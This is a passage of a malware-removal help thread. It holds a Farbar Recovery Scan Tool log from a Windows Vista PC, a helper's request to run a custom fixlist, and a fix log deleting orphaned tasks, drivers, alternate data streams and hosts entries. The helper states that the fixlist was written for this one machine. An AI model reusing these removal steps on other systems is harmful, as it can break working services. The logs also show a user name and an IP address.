C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-10-31 15:27

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 24.10.2018
Ran by Angela (31-10-2018 17:18:02)
Running from C:\Users\Angela\Desktop
Microsoft® Windows Vista™ Home Premium Service Pack 2 (X86) (2009-03-12 04:40:50)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2860630475-1531993715-2310474269-500 - Administrator - Disabled)
Angela (S-1-5-21-2860630475-1531993715-2310474269-1000 - Administrator - Enabled) => C:\Users\Angela
Guest (S-1-5-21-2860630475-1531993715-2310474269-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Compatibility Pack for the 2007 Office system (HKLM\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
CyberLink Power2Go (HKLM\...\{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 5.5.4316 - CyberLink Corp.)
D3DX10 (HKLM\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
Gateway Games (HKLM\...\WildTangent gateway Master Uninstall) (Version: 1.0.0.71 - WildTangent)
Gateway Recovery Management (HKLM\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 3.1.3003 - Acer Incorporated)
IDT Audio (HKLM\...\{07D8511D-C9FE-4A93-933F-EAA5C8F20095}) (Version: 5.10.5303.0 - IDT)
Illustrated Guide to Veterinary Medical Terminology, 3e (HKLM\...\Illustrated Guide to Veterinary Medical Terminology, 3e_is1) (Version: - Cengage Delmar Learning)
ImTOO DVD Creator (HKLM\...\ImTOO DVD Creator) (Version: 3.0.45.1127 - ImTOO)
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: - Intel Corporation)
Magic DVD Copier Version 5.0.1 (HKLM\...\Magic DVD Copier_is1) (Version: - Magic DVD Software, Inc.)
Malwarebytes version 3.5.1.2522 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.5.1.2522 - Malwarebytes)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Web Publishing Wizard 1.52 (HKLM\...\WebPost) (Version: - )
Microsoft Works (HKLM\...\{67E03279-F703-408F-B4BF-46B5FC8D70CD}) (Version: 9.7.0621 - Microsoft Corporation)
MSXML 4.0 SP2 (KB927978) (HKLM\...\{37477865-A3F1-4772-AD43-AAFC6BCFF99F}) (Version: 4.20.9841.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NETGEAR WNA1000M Wireless USB 2.0 Adapter (HKLM\...\{62F7B391-E2B2-4714-BBAA-A14E4FAAB95C}) (Version: 1.01.10 - NETGEAR) Hidden
NETGEAR WNA1000M Wireless USB 2.0 Adapter (HKLM\...\InstallShield_{62F7B391-E2B2-4714-BBAA-A14E4FAAB95C}) (Version: 1.01.10 - NETGEAR)
OGA Notifier 2.0.0048.0 (HKLM\...\{B2544A03-10D0-4E5E-BA69-0362FFC20D18}) (Version: 2.0.0048.0 - Microsoft Corporation) Hidden
Realtek 8169, 8168, 8101E and 8102E Ethernet Network Card Driver for Windows Vista (HKLM\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0000 - Realtek)
Realtek USB 2.0 Card Reader (HKLM\...\{DC24971E-1946-445D-8A82-CE685433FA7D}) (Version: - Realtek Semiconductor Corp.)
RogueKiller version 13.0.5.0 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 13.0.5.0 - Adlice Software)
Segoe UI (HKLM\...\{5DD4FCBD-A3C1-4155-9E17-4161C70AAABA}) (Version: 15.4.2271.0615 - Microsoft Corp) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 9.1.3.0 - Synaptics)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Sync (HKLM\...\{A1BF9950-8CDB-468E-83FA-EACFB00EA7D5}) (Version: 14.0.8064.206 - Microsoft Corporation)
WLTB Custom Buttons (HKLM\...\{C6522325-92ED-4312-A45A-04E45896C130}) (Version: 1.0.0 - Microsoft)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-05-09] (Malwarebytes)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2008-09-01] (Intel Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-05-09] (Malwarebytes)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {00FF43E5-657C-4B78-B399-7ACBEF0A3292} - \Seventh -> No File <==== ATTENTION
Task: {022DEE05-561E-4CA8-9E66-5E15E40FA6C9} - \DNSTANNERSVILLE -> No File <==== ATTENTION
Task: {033CCE13-BDD9-4CB1-9DA7-D727FDDC0E42} - \avayvaxvaa -> No File <==== ATTENTION
Task: {2C48990D-9649-4BD7-8E9F-DD99174E6408} - \Genius_Interval -> No File <==== ATTENTION
Task: {38F1B313-1F9E-486F-81E2-B88C8BA48973} - \Genius -> No File <==== ATTENTION
Task: {4A7287A7-CBDE-4977-BBA9-40E905E65DC6} - \UOEJSMCMOGWSTARU -> No File <==== ATTENTION
Task: {A241D5E1-D344-4097-8319-D5932BEE465A} - \{05040C47-0805-0C05-0B11-0B0E05041109} -> No File <==== ATTENTION
Task: {B35A6A11-D772-4D2D-B6D3-7664D58A3EE5} - \One System Care Task -> No File <==== ATTENTION
Task: {B643A498-2E30-4C67-B841-A7AEDD004C4B} - \Sixth -> No File <==== ATTENTION
Task: {DC5A0A70-9FE1-4847-8DC5-34F54A2B5E3B} - \System Healer Task -> No File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


==================== Loaded Modules (Whitelisted) ==============

2009-03-11 22:48 - 2008-06-11 12:18 - 000024576 _____ () C:\Program Files\GATEWAY\Gateway Recovery Management\Service\ETService.exe
2009-03-11 22:48 - 2009-03-11 22:48 - 000032768 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Model.Controller\3.0.3009.0__14bcaafdb44b5951\Framework.Model.Controller.dll
2009-03-11 22:48 - 2009-03-11 22:48 - 000009216 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Model.ControllerInterface\3.0.3009.0__d842b71b4d6ed079\Framework.Model.ControllerInterface.dll
2009-03-11 22:48 - 2009-03-11 22:48 - 000061440 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Library\3.0.3009.0__3036420f80dd6947\Framework.Library.dll
2009-03-11 22:48 - 2009-03-11 22:48 - 000015360 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Host\3.0.3009.0__672b450de5a7e94a\Framework.Host.dll
2009-03-11 22:48 - 2009-03-11 22:48 - 000006144 _____ () C:\Windows\assembly\GAC_MSIL\Framework.PluginInterface\3.0.3009.0__9ecdf03bb2054f94\Framework.PluginInterface.dll
2009-03-11 22:48 - 2009-03-11 22:48 - 000036864 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Utility\3.0.3009.0__4df5dcab8860d239\Framework.Utility.dll
2011-06-30 22:23 - 2011-06-30 22:23 - 000167936 _____ () C:\Program Files\NETGEAR\WNA1000M\WlanWpsSvc.exe
2018-10-31 00:40 - 2018-04-25 13:16 - 001930960 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2018-10-31 00:40 - 2018-04-30 12:54 - 001913552 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:7631EA83 [118]
AlternateDataStreams: C:\ProgramData\TEMP:9AB56A06 [122]
AlternateDataStreams: C:\ProgramData\TEMP:C46995DA [286]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2006-11-02 04:23 - 2007-03-20 02:16 - 000000904 ____N C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 localhost
127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2860630475-1531993715-2310474269-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Angela\AppData\Roaming\Microsoft\Windows Photo Gallery\Windows Photo Gallery Wallpaper.jpg
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 1) (EnableLUA: 0)
Windows Firewall is disabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

MSCONFIG\Services: sprtsvc_quickcare => 2
MSCONFIG\Services: SupportSoft RemoteAssist => 3
MSCONFIG\Services: tgsrvc_quickcare => 2

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [WinCollab-Out-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-Out-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-DFSR-Out-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [WinCollab-DFSR-In-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe

==================== Restore Points =========================

30-10-2018 23:39:08 Removed Itibiti RTC

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (10/31/2018 03:23:40 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.


System errors:
=============
Error: (10/31/2018 05:12:45 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Windows Network Services (WVN11) service terminated unexpectedly. It has done this 1 time(s).

Error: (10/31/2018 05:12:43 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Windows Audio Services (R1) service terminated unexpectedly. It has done this 1 time(s).

Error: (10/31/2018 05:12:42 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Ppm Advertisement service terminated unexpectedly. It has done this 1 time(s).

Error: (10/31/2018 05:12:42 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Burn Email Provider service terminated unexpectedly. It has done this 1 time(s).

Error: (10/31/2018 03:23:40 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cherimoya
qrnfd_1_10_0_9
swsedrvr_vt_1_10_0_29
SymIRON
{a55667f1-a319-4629-a8b6-a68d9d3313ee}Gt

Error: (10/31/2018 03:23:40 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Parallel port driver service failed to start due to the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (10/31/2018 03:22:04 PM) (Source: Microsoft-Windows-TaskScheduler) (EventID: 412) (User: NT AUTHORITY)
Description: Event-ID 412

Error: (10/31/2018 03:22:04 PM) (Source: HTTP) (EventID: 15021) (User: )
Description: An error occured while using SSL configuration for socket address 70.164.133.242:63331. The error status code is contained within the returned data.


CodeIntegrity:
===================================

Date: 2018-10-31 17:17:58.396
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

Date: 2018-10-31 17:17:57.476
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

Date: 2018-10-31 17:17:56.602
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

Date: 2018-10-31 17:17:55.697
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

Date: 2018-10-31 17:17:41.235
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\SYMEVENT.SYS because the set of per-page image hashes could not be found on the system.

Date: 2018-10-31 17:17:40.346
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\SYMEVENT.SYS because the set of per-page image hashes could not be found on the system.

Date: 2018-10-31 17:17:39.441
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\SYMEVENT.SYS because the set of per-page image hashes could not be found on the system.

Date: 2018-10-31 17:17:38.568
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\SYMEVENT.SYS because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Processor: Intel(R) Pentium(R) Dual CPU T3400 @ 2.16GHz
Percentage of memory in use: 52%
Total physical RAM: 2037.69 MB
Available physical RAM: 966.01 MB
Total Virtual: 4312.66 MB
Available Virtual: 3208.39 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:222.88 GB) (Free:161.61 GB) NTFS ==>[drive with boot components (obtained from BCD)]

\\?\Volume{b27fdb1c-0ebe-11de-9864-806e6f6e6963}\ (PQSERVICE) (Fixed) (Total:10 GB) (Free:3.18 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 232.9 GB) (Disk ID: 88A5A4A5)
Partition 1: (Not Active) - (Size=10 GB) - (Type=27)
Partition 2: (Active) - (Size=222.9 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================
 

Starbuck

Admin & Security Team
Joined
Feb 19, 2010
Messages
4,509
Location
Midlands, UK
PC Experience
Very Experienced
#6
Hi Rustys,

Looks like Rogue Killer has cleaned up quite a bit for us.
Let's deal with a few more items now.

Please download the attached fixlist.txt file (bottom of this post) and save it to the Desktop.
NOTE.
It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine.
Running this on another machine may cause damage to your operating system


Re-run FRST/FRST64 (which ever is installed ) and press the Fix button just once and wait.

HbL7sAI.png

The tool will make a log on the Desktop (Fixlog.txt). Please post this in your next reply.

In your next reply, also give me an update on how the system is running now.

Thanks
 

Attachments

Rustys

Joined
Aug 28, 2017
Messages
134
Location
Here since I am not there
PC Experience
Very Experienced
#7
How are we looking?

As far as running better just need to fix some windows issues when we give it a clean bill of health.

Fix result of Farbar Recovery Scan Tool (x86) Version: 24.10.2018
Ran by Angela (01-11-2018 14:19:42) Run:1
Running from C:\Users\Angela\Desktop
Loaded Profiles: Angela (Available Profiles: Angela)
Boot Mode: Normal
==============================================
fixlist content:
*****************
CloseProcesses:
SearchScopes: HKU\S-1-5-21-2860630475-1531993715-2310474269-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
Toolbar: HKU\S-1-5-21-2860630475-1531993715-2310474269-1000 -> No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} - No File
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S1 qrnfd_1_10_0_9; system32\drivers\qrnfd_1_10_0_9.sys [X]
S1 swsedrvr_vt_1_10_0_29; system32\drivers\swsedrvr_vt_1_10_0_29.sys [X]
S3 vzandnetdiag; system32\DRIVERS\lgvzandnetdiag.sys [X]
S3 vzandnetdiag2; system32\DRIVERS\lgvzandnetdiag2.sys [X]
S3 vzandnetmodem; system32\DRIVERS\lgvzandnetmdm.sys [X]
S3 vzandnetndis; system32\DRIVERS\lgvzandnetndis.sys [X]
S1 {a55667f1-a319-4629-a8b6-a68d9d3313ee}Gt; system32\drivers\{a55667f1-a319-4629-a8b6-a68d9d3313ee}Gt.sys [X]
Task: {00FF43E5-657C-4B78-B399-7ACBEF0A3292} - \Seventh -> No File <==== ATTENTION
Task: {022DEE05-561E-4CA8-9E66-5E15E40FA6C9} - \DNSTANNERSVILLE -> No File <==== ATTENTION
Task: {033CCE13-BDD9-4CB1-9DA7-D727FDDC0E42} - \avayvaxvaa -> No File <==== ATTENTION
Task: {2C48990D-9649-4BD7-8E9F-DD99174E6408} - \Genius_Interval -> No File <==== ATTENTION
Task: {38F1B313-1F9E-486F-81E2-B88C8BA48973} - \Genius -> No File <==== ATTENTION
Task: {4A7287A7-CBDE-4977-BBA9-40E905E65DC6} - \UOEJSMCMOGWSTARU -> No File <==== ATTENTION
Task: {A241D5E1-D344-4097-8319-D5932BEE465A} - \{05040C47-0805-0C05-0B11-0B0E05041109} -> No File <==== ATTENTION
Task: {B35A6A11-D772-4D2D-B6D3-7664D58A3EE5} - \One System Care Task -> No File <==== ATTENTION
Task: {B643A498-2E30-4C67-B841-A7AEDD004C4B} - \Sixth -> No File <==== ATTENTION
Task: {DC5A0A70-9FE1-4847-8DC5-34F54A2B5E3B} - \System Healer Task -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\TEMP:7631EA83 [118]
AlternateDataStreams: C:\ProgramData\TEMP:9AB56A06 [122]
AlternateDataStreams: C:\ProgramData\TEMP:C46995DA [286]
CMD: ipconfig /flushdns
Hosts:
EmptyTemp:
*****************
Processes closed successfully.
"HKU\S-1-5-21-2860630475-1531993715-2310474269-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => removed successfully.
"HKU\S-1-5-21-2860630475-1531993715-2310474269-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{604BC32A-9680-40D1-9AC6-E06B23A1BA4C}" => removed successfully.
HKLM\Software\Classes\CLSID\{604BC32A-9680-40D1-9AC6-E06B23A1BA4C} => not found
HKLM\System\CurrentControlSet\Services\IpInIp => removed successfully.
IpInIp => service removed successfully.
HKLM\System\CurrentControlSet\Services\NwlnkFlt => removed successfully.
NwlnkFlt => service removed successfully.
HKLM\System\CurrentControlSet\Services\NwlnkFwd => removed successfully.
NwlnkFwd => service removed successfully.
HKLM\System\CurrentControlSet\Services\qrnfd_1_10_0_9 => removed successfully.
qrnfd_1_10_0_9 => service removed successfully.
HKLM\System\CurrentControlSet\Services\swsedrvr_vt_1_10_0_29 => removed successfully.
swsedrvr_vt_1_10_0_29 => service removed successfully.
HKLM\System\CurrentControlSet\Services\vzandnetdiag => removed successfully.
vzandnetdiag => service removed successfully.
HKLM\System\CurrentControlSet\Services\vzandnetdiag2 => removed successfully.
vzandnetdiag2 => service removed successfully.
HKLM\System\CurrentControlSet\Services\vzandnetmodem => removed successfully.
vzandnetmodem => service removed successfully.
HKLM\System\CurrentControlSet\Services\vzandnetndis => removed successfully.
vzandnetndis => service removed successfully.
HKLM\System\CurrentControlSet\Services\{a55667f1-a319-4629-a8b6-a68d9d3313ee}Gt => removed successfully.
{a55667f1-a319-4629-a8b6-a68d9d3313ee}Gt => service removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{00FF43E5-657C-4B78-B399-7ACBEF0A3292}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{00FF43E5-657C-4B78-B399-7ACBEF0A3292}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Seventh" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{022DEE05-561E-4CA8-9E66-5E15E40FA6C9}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{022DEE05-561E-4CA8-9E66-5E15E40FA6C9}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DNSTANNERSVILLE" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{033CCE13-BDD9-4CB1-9DA7-D727FDDC0E42}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{033CCE13-BDD9-4CB1-9DA7-D727FDDC0E42}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\avayvaxvaa" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2C48990D-9649-4BD7-8E9F-DD99174E6408}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2C48990D-9649-4BD7-8E9F-DD99174E6408}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Genius_Interval" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{38F1B313-1F9E-486F-81E2-B88C8BA48973}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{38F1B313-1F9E-486F-81E2-B88C8BA48973}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Genius" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4A7287A7-CBDE-4977-BBA9-40E905E65DC6}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4A7287A7-CBDE-4977-BBA9-40E905E65DC6}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UOEJSMCMOGWSTARU" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A241D5E1-D344-4097-8319-D5932BEE465A}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A241D5E1-D344-4097-8319-D5932BEE465A}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{05040C47-0805-0C05-0B11-0B0E05041109}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B35A6A11-D772-4D2D-B6D3-7664D58A3EE5}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B35A6A11-D772-4D2D-B6D3-7664D58A3EE5}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\One System Care Task" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B643A498-2E30-4C67-B841-A7AEDD004C4B}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B643A498-2E30-4C67-B841-A7AEDD004C4B}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Sixth" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DC5A0A70-9FE1-4847-8DC5-34F54A2B5E3B}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DC5A0A70-9FE1-4847-8DC5-34F54A2B5E3B}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\System Healer Task" => removed successfully.
C:\ProgramData\TEMP => ":7631EA83" ADS removed successfully.
C:\ProgramData\TEMP => ":9AB56A06" ADS removed successfully.
C:\ProgramData\TEMP => ":C46995DA" ADS removed successfully.
========= ipconfig /flushdns =========

Windows IP Configuration
Successfully flushed the DNS Resolver Cache.
========= End of CMD: =========
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 2179257 B
Java, Flash, Steam htmlcache => 523 B
Windows/system/drivers => 2702 B
Edge => 0 B
Chrome => 0 B
Firefox => 0 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 66600 B
Public => 0 B
ProgramData => 0 B
systemprofile => 50869435 B
LocalService => 132244 B
NetworkService => 66228 B
Angela => 417160 B
RecycleBin => 0 B
EmptyTemp: => 59.2 MB temporary data Removed.
================================

The system needed a reboot.
==== End of Fixlog 14:20:20 ====
 

Starbuck

Admin & Security Team
Joined
Feb 19, 2010
Messages
4,509
Location
Midlands, UK
PC Experience
Very Experienced
#8
Hi Rustys,

The FRST fix did it's job. :)
Looking a lot better now.

You might want to look into this....
Windows Firewall is disabled.
